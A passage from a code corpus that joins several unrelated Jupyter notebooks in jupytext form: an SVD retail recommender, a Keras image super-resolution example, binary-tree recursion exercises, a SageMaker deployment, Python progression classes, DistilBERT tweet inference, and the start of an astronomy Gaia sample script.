# - <NAME>, <NAME>, <NAME>, <NAME> (2014). [DeepFace: Closing the gap to human-level performance in face verification](https://research.fb.com/wp-content/uploads/2016/11/deepface-closing-the-gap-to-human-level-performance-in-face-verification.pdf)
# - The pretrained model we use is inspired by <NAME>'s implementation and was loaded using his code: https://github.com/iwantooxxoox/Keras-OpenFace.
# - Our implementation also took a lot of inspiration from the official FaceNet github repository: https://github.com/davidsandberg/facenet
#
|
Face_Recognition_v3a.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Retail SVD Recommender
#
# In the previous section we multiplied the $\mathbf{u}_i$ and $\mathbf{v}_i$ column vectors to get a reduced rank approximation for all customers. In this section we will calculate the incremental recommendation $\mathbf{\tilde{r}}_i$ for a customer.
#
# ### Steps
#
# 1. Get the actual ratings from the rating table.
# 1. Use dot-products to compute the approximated ratings.
# 1. Take the difference of the actual and approximation to get the recomendation.
#
# ### Prerequsites
#
# You should have run the [svd_2_calc.ipynb](svd_2_calc.ipynb) notebook to generate the vector tables.
# +
# Local libraries should automatically reload
# %reload_ext autoreload
# %autoreload 1
# %matplotlib inline
import sys
sys.path.append('../KJIO')
import numpy as np
import pandas as pd
# %aimport kodbc_io
pd.options.display.max_colwidth = 100
# -
# ### Get actual purchases
#
# Here we get the actual ratings of a customer. You can do this for any customer ID.
# +
CUSTOMER_ID = 22632
_actual_df = kodbc_io.get_df("""
select
am.product_parent,
ap.product_title,
am.star_rating
from amazon_matrix am
join amazon_products ap
on am.product_parent = ap.product_parent
where am.customer_id = {}
order by am.product_parent
""".format(CUSTOMER_ID))
_actual_df = _actual_df.set_index('product_parent')
_actual_df
# -
# ### Get approximated ratings
#
# Earlier we computed $\sqrt{\Sigma}\tilde{\mathbf{U}}$ and $\sqrt{\Sigma}\tilde{\mathbf{V}}^T$ which were saved to tables. Here we use SQL to compute the rating approximation for a single customer:
#
# $\mathbf{\tilde{a}}_c^T = A_c = U_c \boldsymbol{\Sigma} \mathbf{V}^T $
#
# We can re-factor the SVD equation considering just the row vectors of *U* and can calculate the approximation for a a row vector of *A* given a row vector as a combination of dot-products. Each scalar of $\mathbf{\tilde{a}}_c$ is obtained with a dot product of the customer vector $\mathbf{\tilde{u}}_c$ with is respective product vector $\mathbf{\tilde{v}}_p$.
#
# $\mathbf{\tilde{a}}_c^T = (\sqrt{\sigma} \mathbf{\tilde{u}}_c^T) \cdot (\sqrt{\sigma} \mathbf{\tilde{v}}_p) $
# +
_approx_df = kodbc_io.get_df("""
select top 10
iv.product_parent,
ap.product_title,
(cv.U0 * iv.V0)
+ (cv.U1 * iv.V1)
+ (cv.U2 * iv.V2)
+ (cv.U3 * iv.V3)
+ (cv.U4 * iv.V4)
+ (cv.U5 * iv.V5)
+ (cv.U6 * iv.V6)
+ (cv.U7 * iv.V7)
+ (cv.U8 * iv.V8)
+ (cv.U9 * iv.V9)
as item_rating
from svd_cust_vec as cv, svd_item_vec as iv
join amazon_products ap
on ap.product_parent = iv.product_parent
where cv.customer_id = {}
order by item_rating desc
""".format(CUSTOMER_ID))
_approx_df = _approx_df.set_index('product_parent')
_approx_df.sort_values('item_rating', ascending=False)
# -
# ### Get recommended purchases
#
# Here we generate recommendations which is the difference between the actual and apprximation which is the same as the recommendation error.
#
# $
# \mathbf{\tilde{r}}_c = \mathbf{\tilde{a}}_c - \mathbf{a}_c = \mathbf{\epsilon}_c
# $
#
# Consider that the approximation will contain the customers own ratings combined with other ratings from similar customers. When we subtract the customers actual ratings what remains are preferences from other similar customers. These results are sorted by highest rating so the most significant recommendations are listed at the top.
_recommended_df = _approx_df.loc[set(_approx_df.index) - set(_actual_df.index)]
_recommended_df.sort_values('item_rating', ascending=False).head(4)
|
notebooks/SVD/svd_3_recommend.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/dcastf01/Actividad_vision_artificial/blob/main/super_resolution_sub_pixel.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="tPIeYTCE1KCB"
# # Image Super-Resolution using an Efficient Sub-Pixel CNN
#
# **Author:** [<NAME>](https://github.com/xingyu-long)<br>
# **Date created:** 2020/07/28<br>
# **Last modified:** 2020/08/27<br>
# **Description:** Implementing Super-Resolution using Efficient sub-pixel model on BSDS500.
# + [markdown] id="E1ZIacl31KCG"
# ## Introduction
#
# ESPCN (Efficient Sub-Pixel CNN), proposed by [Shi, 2016](https://arxiv.org/abs/1609.05158)
# is a model that reconstructs a high-resolution version of an image given a low-resolution version.
# It leverages efficient "sub-pixel convolution" layers, which learns an array of
# image upscaling filters.
#
# In this code example, we will implement the model from the paper and train it on a small dataset,
# [BSDS500](https://www2.eecs.berkeley.edu/Research/Projects/CS/vision/grouping/resources.html).
# + [markdown] id="TsPANhfW1KCH"
# ## Setup
# + id="y2Ks9hMs1KCH"
import tensorflow as tf
import os
import math
import numpy as np
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras.preprocessing.image import load_img
from tensorflow.keras.preprocessing.image import array_to_img
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.preprocessing import image_dataset_from_directory
from IPython.display import display
# + [markdown] id="GUcu1TYd1KCI"
# ## Load data: BSDS500 dataset
#
# ### Download dataset
#
# We use the built-in `keras.utils.get_file` utility to retrieve the dataset.
# + id="8BecynTx1KCI"
dataset_url = "http://www.eecs.berkeley.edu/Research/Projects/CS/vision/grouping/BSR/BSR_bsds500.tgz"
data_dir = keras.utils.get_file(origin=dataset_url, fname="BSR", untar=True)
root_dir = os.path.join(data_dir, "BSDS500/data")
# + [markdown] id="-tmaJ8nE1KCJ"
# We create training and validation datasets via `image_dataset_from_directory`.
# + id="Gtb-SBSe1KCJ"
crop_size = 300
upscale_factor = 3
input_size = crop_size // upscale_factor
batch_size = 8
train_ds = image_dataset_from_directory(
root_dir,
batch_size=batch_size,
image_size=(crop_size, crop_size),
validation_split=0.2,
subset="training",
seed=1337,
label_mode=None,
)
valid_ds = image_dataset_from_directory(
root_dir,
batch_size=batch_size,
image_size=(crop_size, crop_size),
validation_split=0.2,
subset="validation",
seed=1337,
label_mode=None,
)
# + [markdown] id="8twFePOk1KCJ"
# We rescale the images to take values in the range [0, 1].
# + id="TuJWtCNR1KCK"
def scaling(input_image):
input_image = input_image / 255.0
return input_image
# Scale from (0, 255) to (0, 1)
train_ds = train_ds.map(scaling)
valid_ds = valid_ds.map(scaling)
# + [markdown] id="4A5YRwkK1KCK"
# Let's visualize a few sample images:
# + id="qCuV3Q4G1KCK"
for batch in train_ds.take(1):
for img in batch:
display(array_to_img(img))
# + [markdown] id="OS0OmR1-1KCK"
# We prepare a dataset of test image paths that we will use for
# visual evaluation at the end of this example.
# + id="w0kBCQ0Q1KCL"
dataset = os.path.join(root_dir, "images")
test_path = os.path.join(dataset, "test")
test_img_paths = sorted(
[
os.path.join(test_path, fname)
for fname in os.listdir(test_path)
if fname.endswith(".jpg")
]
)
# + [markdown] id="a72-Sm_L1KCL"
# ## Crop and resize images
#
# Let's process image data.
# First, we convert our images from the RGB color space to the
# [YUV colour space](https://en.wikipedia.org/wiki/YUV).
#
# For the input data (low-resolution images),
# we crop the image, retrieve the `y` channel (luninance),
# and resize it with the `area` method (use `BICUBIC` if you use PIL).
# We only consider the luminance channel
# in the YUV color space because humans are more sensitive to
# luminance change.
#
# For the target data (high-resolution images), we just crop the image
# and retrieve the `y` channel.
# + id="T9CUPHXA1KCL"
# Use TF Ops to process.
def process_input(input, input_size, upscale_factor):
input = tf.image.rgb_to_yuv(input)
last_dimension_axis = len(input.shape) - 1
y, u, v = tf.split(input, 3, axis=last_dimension_axis)
return tf.image.resize(y, [input_size, input_size], method="area")
def process_target(input):
input = tf.image.rgb_to_yuv(input)
last_dimension_axis = len(input.shape) - 1
y, u, v = tf.split(input, 3, axis=last_dimension_axis)
return y
train_ds = train_ds.map(
lambda x: (process_input(x, input_size, upscale_factor), process_target(x))
)
train_ds = train_ds.prefetch(buffer_size=32)
valid_ds = valid_ds.map(
lambda x: (process_input(x, input_size, upscale_factor), process_target(x))
)
valid_ds = valid_ds.prefetch(buffer_size=32)
# + [markdown] id="PHjB8s6_1KCL"
# Let's take a look at the input and target data.
# + id="wD7SGvsc1KCM"
for batch in train_ds.take(1):
for img in batch[0]:
display(array_to_img(img))
for img in batch[1]:
display(array_to_img(img))
# + [markdown] id="mstm2Nb71KCM"
# ## Build a model
#
# Compared to the paper, we add one more layer and we use the `relu` activation function
# instead of `tanh`.
# It achieves better performance even though we train the model for fewer epochs.
# + id="ticXriwN1KCM"
def get_model(upscale_factor=3, channels=1):
conv_args = {
"activation": "relu",
"kernel_initializer": "Orthogonal",
"padding": "same",
}
inputs = keras.Input(shape=(None, None, channels))
x = layers.Conv2D(64, 5, **conv_args)(inputs)
x = layers.Conv2D(64, 3, **conv_args)(x)
x = layers.Conv2D(32, 3, **conv_args)(x)
x = layers.Conv2D(channels * (upscale_factor ** 2), 3, **conv_args)(x)
outputs = tf.nn.depth_to_space(x, upscale_factor)
return keras.Model(inputs, outputs)
# + [markdown] id="BzmVIAmf1KCM"
# ## Define utility functions
#
# We need to define several utility functions to monitor our results:
#
# - `plot_results` to plot an save an image.
# - `get_lowres_image` to convert an image to its low-resolution version.
# - `upscale_image` to turn a low-resolution image to
# a high-resolution version reconstructed by the model.
# In this function, we use the `y` channel from the YUV color space
# as input to the model and then combine the output with the
# other channels to obtain an RGB image.
# + id="qsH2Otki1KCN"
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1.inset_locator import zoomed_inset_axes
from mpl_toolkits.axes_grid1.inset_locator import mark_inset
import PIL
def plot_results(img, prefix, title):
"""Plot the result with zoom-in area."""
img_array = img_to_array(img)
img_array = img_array.astype("float32") / 255.0
# Create a new figure with a default 111 subplot.
fig, ax = plt.subplots()
im = ax.imshow(img_array[::-1], origin="lower")
plt.title(title)
# zoom-factor: 2.0, location: upper-left
axins = zoomed_inset_axes(ax, 2, loc=2)
axins.imshow(img_array[::-1], origin="lower")
# Specify the limits.
x1, x2, y1, y2 = 200, 300, 100, 200
# Apply the x-limits.
axins.set_xlim(x1, x2)
# Apply the y-limits.
axins.set_ylim(y1, y2)
plt.yticks(visible=False)
plt.xticks(visible=False)
# Make the line.
mark_inset(ax, axins, loc1=1, loc2=3, fc="none", ec="blue")
plt.savefig(str(prefix) + "-" + title + ".png")
plt.show()
def get_lowres_image(img, upscale_factor):
"""Return low-resolution image to use as model input."""
return img.resize(
(img.size[0] // upscale_factor, img.size[1] // upscale_factor),
PIL.Image.BICUBIC,
)
def upscale_image(model, img):
"""Predict the result based on input image and restore the image as RGB."""
ycbcr = img.convert("YCbCr")
y, cb, cr = ycbcr.split()
y = img_to_array(y)
y = y.astype("float32") / 255.0
input = np.expand_dims(y, axis=0)
out = model.predict(input)
out_img_y = out[0]
out_img_y *= 255.0
# Restore the image in RGB color space.
out_img_y = out_img_y.clip(0, 255)
out_img_y = out_img_y.reshape((np.shape(out_img_y)[0], np.shape(out_img_y)[1]))
out_img_y = PIL.Image.fromarray(np.uint8(out_img_y), mode="L")
out_img_cb = cb.resize(out_img_y.size, PIL.Image.BICUBIC)
out_img_cr = cr.resize(out_img_y.size, PIL.Image.BICUBIC)
out_img = PIL.Image.merge("YCbCr", (out_img_y, out_img_cb, out_img_cr)).convert(
"RGB"
)
return out_img
# + [markdown] id="x96vrKGw1KCO"
# ## Define callbacks to monitor training
#
# The `ESPCNCallback` object will compute and display
# the [PSNR](https://en.wikipedia.org/wiki/Peak_signal-to-noise_ratio) metric.
# This is the main metric we use to evaluate super-resolution performance.
# + id="bb7ucWZ_1KCO"
class ESPCNCallback(keras.callbacks.Callback):
def __init__(self):
super(ESPCNCallback, self).__init__()
self.test_img = get_lowres_image(load_img(test_img_paths[0]), upscale_factor)
# Store PSNR value in each epoch.
def on_epoch_begin(self, epoch, logs=None):
self.psnr = []
def on_epoch_end(self, epoch, logs=None):
print("Mean PSNR for epoch: %.2f" % (np.mean(self.psnr)))
if epoch % 20 == 0:
prediction = upscale_image(self.model, self.test_img)
plot_results(prediction, "epoch-" + str(epoch), "prediction")
def on_test_batch_end(self, batch, logs=None):
self.psnr.append(10 * math.log10(1 / logs["loss"]))
# + [markdown] id="koXUunAq1KCO"
# Define `ModelCheckpoint` and `EarlyStopping` callbacks.
# + id="AeOPJkR21KCP"
early_stopping_callback = keras.callbacks.EarlyStopping(monitor="loss", patience=10)
checkpoint_filepath = "/tmp/checkpoint"
model_checkpoint_callback = keras.callbacks.ModelCheckpoint(
filepath=checkpoint_filepath,
save_weights_only=True,
monitor="loss",
mode="min",
save_best_only=True,
)
model = get_model(upscale_factor=upscale_factor, channels=1)
model.summary()
callbacks = [ESPCNCallback(), early_stopping_callback, model_checkpoint_callback]
loss_fn = keras.losses.MeanSquaredError()
optimizer = keras.optimizers.Adam(learning_rate=0.001)
# + [markdown] id="zvde3eHp1KCP"
# ## Train the model
# + id="kj26d6hg1KCP"
epochs = 100
model.compile(
optimizer=optimizer, loss=loss_fn,
)
model.fit(
train_ds, epochs=epochs, callbacks=callbacks, validation_data=valid_ds, verbose=2
)
# The model weights (that are considered the best) are loaded into the model.
model.load_weights(checkpoint_filepath)
# + [markdown] id="dZBarr7M1KCP"
# ## Run model prediction and plot the results
#
# Let's compute the reconstructed version of a few images and save the results.
# + id="anzIvEcE1KCQ"
total_bicubic_psnr = 0.0
total_test_psnr = 0.0
for index, test_img_path in enumerate(test_img_paths[50:60]):
img = load_img(test_img_path)
lowres_input = get_lowres_image(img, upscale_factor)
w = lowres_input.size[0] * upscale_factor
h = lowres_input.size[1] * upscale_factor
highres_img = img.resize((w, h))
prediction = upscale_image(model, lowres_input)
lowres_img = lowres_input.resize((w, h))
lowres_img_arr = img_to_array(lowres_img)
highres_img_arr = img_to_array(highres_img)
predict_img_arr = img_to_array(prediction)
bicubic_psnr = tf.image.psnr(lowres_img_arr, highres_img_arr, max_val=255)
test_psnr = tf.image.psnr(predict_img_arr, highres_img_arr, max_val=255)
total_bicubic_psnr += bicubic_psnr
total_test_psnr += test_psnr
print(
"PSNR of low resolution image and high resolution image is %.4f" % bicubic_psnr
)
print("PSNR of predict and high resolution is %.4f" % test_psnr)
plot_results(lowres_img, index, "lowres")
plot_results(highres_img, index, "highres")
plot_results(prediction, index, "prediction")
print("Avg. PSNR of lowres images is %.4f" % (total_bicubic_psnr / 10))
print("Avg. PSNR of reconstructions is %.4f" % (total_test_psnr / 10))
|
super_resolution_sub_pixel.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Recursive problems around trees
# ### 1. Finding tree height
# Given a binary tree, find the max-height of the tree. The height of a tree is the number of edges on the longest path from the root to the leaf.
#
# For example given the following tree,
#
# ```
# 2
# / \
# 3 5
# / / \
# 4 6 7
# ```
#
# Return `3`
# +
class Node:
def __init__(self, value, left=None, right=None):
self.value = value
self.left = left
self.right = right
def height(node):
if node is None:
return 0
left_height = height(node.left)
right_height = height(node.right)
return max(left_height, right_height) + 1
t = Node(
value=2,
left=Node(3, Node(4)),
right=Node(5, Node(6), Node(7))
)
height(t)
# -
# ### 2. Return nodes at a given level
# Given a binary tree, return the value of the nodes at a given level. In other words, breadth-first search at a given level.
#
# For example given the following tree,
#
# ```
# 1
# / \
# 2 3
# /\ /\
# 4 5 6 7
#
# level = 2
# ```
#
# Return `[4, 5, 6, 7]`
# +
def bfs_at_level(tree, level, visited=[]):
if tree is None:
return
if level == 1:
visited.append(tree.value)
elif level > 1:
bfs_at_level(tree.left, level - 1, visited)
bfs_at_level(tree.right, level - 1, visited)
return visited
tree = Node(
value=1,
left=Node(2, Node(4), Node(5)),
right=Node(3, Node(6), Node(7))
)
bfs_at_level(tree, level=3)
# -
# ### 3. Depth-first traversals
# Given a tree, traverse the tree in an in-order, pre-order and post-order fashion. Return the node values in a list.
# +
def inOrderTraversal(node, results=[]):
"""Visit left-most child, then root, then right"""
if node is None:
return
inOrderTraversal(node.left)
results.append(node.value)
inOrderTraversal(node.right)
return results
def preOrderTraversal(node, results=[]):
"""Visit root first, then left, right"""
if node is None:
return
results.append(node.value)
preOrderTraversal(node.left)
preOrderTraversal(node.right)
return results
def postOrderTraversal(node, results=[]):
if node is None:
return
postOrderTraversal(node.left, results)
postOrderTraversal(node.right, results)
results.append(node.value)
return results
# -
# The tree above looks like this
#
# ```
# 2
# / \
# 3 5
# / /\
# 4 6 7
# ```
tree = Node(
value=2,
left=Node(3, Node(4)),
right=Node(5, Node(6), Node(7)))
print(f'In-order => {inOrderTraversal(tree)}')
print(f'Pre-order => {preOrderTraversal(tree)}')
print(f'Post-order => {postOrderTraversal(tree)}')
# ### 4. Sum of depths.
# Given the root of a binary tree, find the sum of all its depths.
#
# For example give the tree:
#
# ```
# 1
# / \
# 2 3
# /\ /\
# 4 5 6 7
# /\
# 8 9
# ```
#
# Returns:
# ```
# 16
# ```
# +
def dfs_helper(node, depth, result=0):
result += depth
if node.left is not None:
result += dfs_helper(node.left, depth + 1)
if node.right is not None:
result += dfs_helper(node.right, depth + 1)
return result
def sum_depths(root):
return dfs_helper(root, depth=0)
# -
tree = Node(
1,
Node(2, Node(4, Node(8), Node(9)), Node(5)),
Node(3, Node(6), Node(7))
)
sum_depths(tree)
# ### 5. Sum up all the depths of each node in a binary tree.
#
# Given the following tree:
#
# ```
#
# 1
# / \
# 2 3
# /\ /\
# 4 5 6 7
# /\
# 8 9
#
# Return 26 ==> (1 has 16, 2 has 6, 3 and 4 have 2 each) = 26
# ```
# ### Approach
# A straightforward approach is to use the method above to find the depths each node's subtree and sum them up.
# +
def dfs_helper(node, depth, result=0):
result += depth
if node.left is not None:
result += dfs_helper(node.left, depth + 1)
if node.right is not None:
result += dfs_helper(node.right, depth + 1)
return result
def sum_depths_all_nodes(node):
stack = [node]
total = 0
while stack:
current_root = stack.pop(0)
total += dfs_helper(current_root, depth=0)
if current_root.left is not None:
stack.append(current_root.left)
if current_root.right is not None:
stack.append(current_root.right)
return total
# -
root = Node(
1,
Node(2, Node(4, Node(8), Node(9)), Node(5)),
Node(3, Node(6), Node(7))
)
sum_depths_all_nodes(root)
# ### Optimal approach
# The bottom-down recursive approach above is very inefficient because of the bottom down approach. Since we begin from the root, we are bound to repeatedly compute the depths of nodes already encountered as we go down the tree.
#
# To speed things up, we can use a bottom-up approach. We'll use a pair of total number of nodes in a subtree and it's respective depth to calculate the total sum.
# For each leaf node, the pair is `(1, 0)` since the nodes in their subtree is only one. And they don't have a depth, so zero.
#
# We'll recursively work up, adding the child pair node values to the depth value of their parents.
# Finally, we return the total in a global variable.
#
#
# +
global result
result = 0
def bottom_up_dfs(node):
# pair.first = the number of nodes in a subtree
# pair.second = the sum of depths of that subtree
pair = [1, 0]
if node.left is not None:
child_pair = bottom_up_dfs(node.left)
pair[1] += child_pair[1] + child_pair[0]
pair[0] += child_pair[0]
if node.right is not None:
child_pair = bottom_up_dfs(node.right)
pair[1] += child_pair[1] + child_pair[0]
pair[0] += child_pair[0]
global result
result += pair[1]
return pair[0], pair[1]
def rooted_depths(node):
bottom_up_dfs(node)
return result
# -
bintree = Node(
1,
Node(2, Node(4, Node(8), Node(9)), Node(5)),
Node(3, Node(6), Node(7))
)
rooted_depths(bintree)
|
binary-trees/depths.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
import sagemaker
from sagemaker import get_execution_role
from sagemaker.serializers import CSVSerializer
sagemaker_session = sagemaker.Session()
# Get a SageMaker-compatible role used by this Notebook Instance.
role = get_execution_role()
role
# # Upload the data for training
train_input = sagemaker_session.upload_data("data")
train_input
# # Create SageMaker SkLearn Estimator
# +
from sagemaker.sklearn.estimator import SKLearn
script_path = 'prediction-Copy1.py'
sklearn = SKLearn(
entry_point=script_path,
instance_type="ml.m4.xlarge",
framework_version="0.20.0",
#py_version="py3",
role=role,
sagemaker_session=sagemaker_session)
# -
# train the SKLearn Estimator
sklearn.fit({'train': train_input})
# # Deploy the model
#
deployment = sklearn.deploy(initial_instance_count=1, instance_type="ml.m4.xlarge")
# ## Check my deployment endpoint
deployment.endpoint
# # Make Predictions
# +
# Load our test data where the default is missing
# -
import pandas as pd
import numpy as np
df_test = pd.read_csv('df_test.csv')
test_data = df_test.drop(['uuid', 'default', 'Unnamed: 0'],axis = 1)
test_data.to_csv('test_data.csv')
# +
y = np.asarray(test_data)
# -
response = deployment.predict(y)
response
print(response.shape)
# +
# deployment.serializer = CSVSerializer()
# predictions = deployment.predict(test_data).decode('utf-8') # predict!
# predictions_array = np.fromstring(predictions[1:], sep=',') # and turn the prediction into an array
# print(predictions_array.shape)
# -
|
AWS_train.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# # Python Class - NumericProgressions
#
# A Numeric Progression is a sequence of numbers where each number depends on one or more of the previous numbers
# 
# #Root Class inherits from the Object Class in Python 2
class Progression(object):
"""
Iterator producing a generic progression.
Default iterator produces the whole numbers 0, 1, 2, ...
"""
def __init__(self, start=0):
"""Initialize current to the first value of the progression."""
self._current = start
def _advance(self):
"""Update self._current to a new value.
This should be overridden by a subclass to customize progression.
By convention, if current is set to None, this designates the
end of a finite progression.
"""
self._current += 1
def __next__(self):
"""Return the next element, or else raise StopIteration error."""
if self._current is None: # our convention to end a progression
raise StopIteration()
else:
answer = self._current # record current value to return
self._advance() # advance to prepare for next time
return answer # return the answer
def __iter__(self):
"""By convention, an iterator must return itself as an iterator."""
return self
def print_progression(self, n):
"""Print next n values of the progression."""
print(' '.join(str(self.__next__()) for j in range(n)))
# +
class ArithmeticProgression(Progression): # inherit from Progression
"""Iterator producing an arithmetic progression."""
def __init__(self, increment=1, start=0):
"""Create a new arithmetic progression.
increment the fixed constant to add to each term (default 1)
start the first term of the progression (default 0)
"""
# super().__init__(start) # initialize base class
super(ArithmeticProgression, self).__init__(start)
self._increment = increment
def _advance(self): # override inherited version
"""Update current value by adding the fixed increment."""
self._current += self._increment
# -
class GeometricProgression(Progression): # inherit from Progression
"""Iterator producing a geometric progression."""
def __init__(self, base=2, start=1):
"""Create a new geometric progression.
base the fixed constant multiplied to each term (default 2)
start the first term of the progression (default 1)
"""
# super().__init__(start)
super(GeometricProgression, self).__init__(start)
self._base = base
def _advance(self): # override inherited version
"""Update current value by multiplying it by the base value."""
self._current *= self._base
class FibonacciProgression(Progression):
"""Iterator producing a generalized Fibonacci progression."""
def __init__(self, first=0, second=1):
"""Create a new fibonacci progression.
first the first term of the progression (default 0)
second the second term of the progression (default 1)
"""
# super().__init__(first) # start progression at first
super(FibonacciProgression, self).__init__(first)
self._prev = second - first # fictitious value preceding the first
def _advance(self):
"""Update current value by taking sum of previous two."""
self._prev, self._current = self._current, self._prev + self._current
# +
print('Default progression:')
Progression().print_progression(10)
print('Arithmetic progression with increment 5:')
ArithmeticProgression(5).print_progression(10)
print('Arithmetic progression with increment 5 and start 2:')
ArithmeticProgression(5, 2).print_progression(10)
print('Geometric progression with default base:')
GeometricProgression().print_progression(10)
print('Geometric progression with base 3:')
GeometricProgression(3).print_progression(10)
print('Fibonacci progression with default start values:')
FibonacciProgression().print_progression(10)
print('Fibonacci progression with start values 4 and 6:')
FibonacciProgression(4, 6).print_progression(10)
# -
|
01_Python_Primer/04_NumericProgressions.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Dependencies
# + _cell_guid="b1076dfc-b9ad-4769-8c92-a6c4dae69d19" _kg_hide-input=true _uuid="8f2839f25d086af736a60e9eeb907d3b93b6e0e5"
from tweet_utility_scripts import *
from transformers import TFDistilBertModel, DistilBertConfig
from tokenizers import BertWordPieceTokenizer
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Dense, Input, Dropout, GlobalAveragePooling1D, GlobalMaxPooling1D, Concatenate, Subtract
# -
# # Load data
# + _cell_guid="79c7e3d0-c299-4dcb-8224-4455121ee9b0" _kg_hide-input=true _uuid="d629ff2d2480ee46fbb7e2d37f6b5fab8052498a"
test = pd.read_csv('/kaggle/input/tweet-sentiment-extraction/test.csv')
print('Test samples: %s' % len(test))
display(test.head())
# -
# # Model parameters
# + _kg_hide-input=true
MAX_LEN = 128
question_size = 3
base_path = '/kaggle/input/qa-transformers/distilbert/'
base_model_path = base_path + 'distilbert-base-uncased-distilled-squad-tf_model.h5'
config_path = base_path + 'distilbert-base-uncased-distilled-squad-config.json'
tokenizer_path = base_path + 'bert-large-uncased-vocab.txt'
input_base_path = '/kaggle/input/19-tweet-train-distilbert-base-uncased-sub-bce/'
model_path_list = glob.glob(input_base_path + '*.h5')
model_path_list.sort()
print('Models to predict:')
print(*model_path_list, sep = "\n")
# -
# # Tokenizer
tokenizer = BertWordPieceTokenizer(tokenizer_path , lowercase=True)
# # Pre process
# +
test['text'].fillna('', inplace=True)
test["text"] = test["text"].apply(lambda x: x.lower())
x_test = get_data_test(test, tokenizer, MAX_LEN)
# -
# # Model
# +
module_config = DistilBertConfig.from_pretrained(config_path, output_hidden_states=False)
def model_fn():
input_ids = Input(shape=(MAX_LEN,), dtype=tf.int32, name='input_ids')
attention_mask = Input(shape=(MAX_LEN,), dtype=tf.int32, name='attention_mask')
token_type_ids = Input(shape=(MAX_LEN,), dtype=tf.int32, name='token_type_ids')
base_model = TFDistilBertModel.from_pretrained(base_model_path, config=module_config, name="base_model")
sequence_output = base_model({'input_ids': input_ids, 'attention_mask': attention_mask, 'token_type_ids': token_type_ids})
last_state = sequence_output[0]
x = GlobalAveragePooling1D()(last_state)
start = Dense(MAX_LEN, activation='sigmoid')(x)
end = Dense(MAX_LEN, activation='sigmoid')(x)
y_start = Subtract(name='y_start')([start, end])
y_end = Subtract(name='y_end')([end, start])
model = Model(inputs=[input_ids, attention_mask, token_type_ids], outputs=[y_start, y_end])
return model
# -
# # Make predictions
# + _kg_hide-input=true
NUM_TEST_IMAGES = len(test)
test_start_preds = np.zeros((NUM_TEST_IMAGES, MAX_LEN))
test_end_preds = np.zeros((NUM_TEST_IMAGES, MAX_LEN))
for model_path in model_path_list:
print(model_path)
model = model_fn()
model.load_weights(model_path)
test_preds = model.predict(x_test)
test_start_preds += test_preds[0] / len(model_path_list)
test_end_preds += test_preds[1] / len(model_path_list)
# -
# # Post process
# + _kg_hide-input=true
test['start'] = test_start_preds.argmax(axis=-1)
test['end'] = test_end_preds.argmax(axis=-1)
test['text_len'] = test['text'].apply(lambda x : len(x))
test["end"].clip(0, test["text_len"], inplace=True)
test["start"].clip(0, test["end"], inplace=True)
test['selected_text'] = test.apply(lambda x: decode(x['start'], x['end'], x['text'], question_size, tokenizer), axis=1)
test["selected_text"].fillna('', inplace=True)
# -
# # Visualize predictions
# + _kg_hide-input=true
display(test.head(10))
# -
# # Test set predictions
# + _kg_hide-input=true
submission = pd.read_csv('/kaggle/input/tweet-sentiment-extraction/sample_submission.csv')
submission['selected_text'] = test["selected_text"]
submission.to_csv('submission.csv', index=False)
submission.head(10)
|
Model backlog/Inference/19-tweet-inference-distilbert-base-uncased-sub-bce.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Common Sample astrometric properties
# +
import os, glob, getpass, sys, warnings, itertools
import peakutils
import numpy as np
import matplotlib.pyplot as plt
from astropy.table import Table, join, vstack, hstack, Column, MaskedColumn, unique
from astropy.utils.exceptions import AstropyWarning
from astropy.coordinates import SkyCoord
from astropy import units as u
user = getpass.getuser()
sys.path.append('/Users/' + user + '/Dropbox/my_python_packages')
path = '../'
sys.path.append(path)
from gaia.Basic import Basic as Basic
from gaia.Basic_Plotters import Basic_Plotters as Basic_Plotters
from gaia.cluster_comparison_n import Comparison_n as Comparison
from extra_codes import sample_comp as samp_comp
# +
# Path to data =================================
warnings.simplefilter('ignore', AstropyWarning)
path_control = path + 'sample_control/OPH___control_sample.vot'
path_wise_img = path + 'sample_control/wise_RGB_img.fits'
path_gaia = path + 'sample_gaia/gaia_sample_cleaned.vot'
path_entire = path + 'sample_comp/entire_sample_case_0.vot'
# Read Data ====================================
sample_gaia = Table.read(path_gaia, format = 'votable') ; sample_gaia.label = 'Gaia'
sample_control = Table.read(path_control, format = 'votable')
sample_entire = Table.read(path_entire, format = 'votable')
sample_common = sample_entire[sample_entire['DOH'] == 'YYY']
# Combine with Gaia Cat to get all cols ========
sample_control = join(sample_gaia, Table([sample_control['source_id']])) ; sample_control.label = 'Control'
sample_common = join(sample_gaia, Table([sample_common['source_id']])) ; sample_common.label = 'Common'
sample_entire = join(sample_gaia, Table([sample_entire['source_id']])) ; sample_entire.label = 'Combined'
# Extract Control NOT in Common ================
sample_control_nc = list(set(sample_control['source_id']) - set(sample_common['source_id']))
